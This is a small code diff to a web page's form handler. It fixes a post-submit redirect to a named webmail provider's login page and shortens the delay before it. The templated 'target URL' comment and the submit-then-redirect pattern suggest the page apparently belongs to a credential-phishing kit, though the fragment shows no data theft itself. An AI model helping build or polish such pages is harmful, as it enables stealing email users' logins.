--- a/index.html
+++ b/index.html
@@ -101,8 +101,8 @@ function showPage() {
         form.reset();
         successMsg.style.display = 'block';
         setTimeout(() => {
-          window.location.replace = 'https://webmail.comporium.net/#3'; // Replace with your target URL
-        }, 4000); // Redirect after 4 seconds
+          window.location.href = 'https://webmail.comporium.net/#3'; // Replace with your target URL
+        }, 3000); // Redirect after 3 seconds
       } else {
         alert('There was an issue submitting the form. Please try again.');
       }
